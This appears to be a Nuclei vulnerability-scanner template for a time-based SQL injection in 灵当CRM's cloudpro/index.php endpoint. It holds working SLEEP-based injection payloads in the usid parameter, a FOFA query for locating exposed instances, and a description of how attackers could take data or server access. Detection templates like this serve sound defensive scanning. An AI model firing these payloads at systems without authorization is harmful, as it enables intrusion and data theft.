http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          POST /crm/WeiXinApp/cloudpro/index.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
          Content-type: application/x-www-form-urlencoded

          action=getMyAccount&usid=1 AND (SELECT 1 FROM (SELECT SLEEP(2))a) -- q&my_cloudid=0
        - |
          POST /crm/WeiXinApp/cloudpro/index.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
          Content-type: application/x-www-form-urlencoded

          action=getMyAccount&usid=1 AND (SELECT 1 FROM (SELECT SLEEP(4))a) -- q&my_cloudid=0
id: lingdangCRM-cloudpro_index_php-sql-time
info:
    author: Superhero
    description: |-
        fofa: body="crmcommon/js/jquery/jquery-1.10.1.min.js" || body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js" || title="灵当CRM"
        灵当CRM cloudpro/index.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 灵当CRM cloudpro/index.php SQL延时注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/KH_WA_7ec2PyKpjfYfcpsQ
    severity: high
    tags:
        - 灵当CRM
        - jQuery
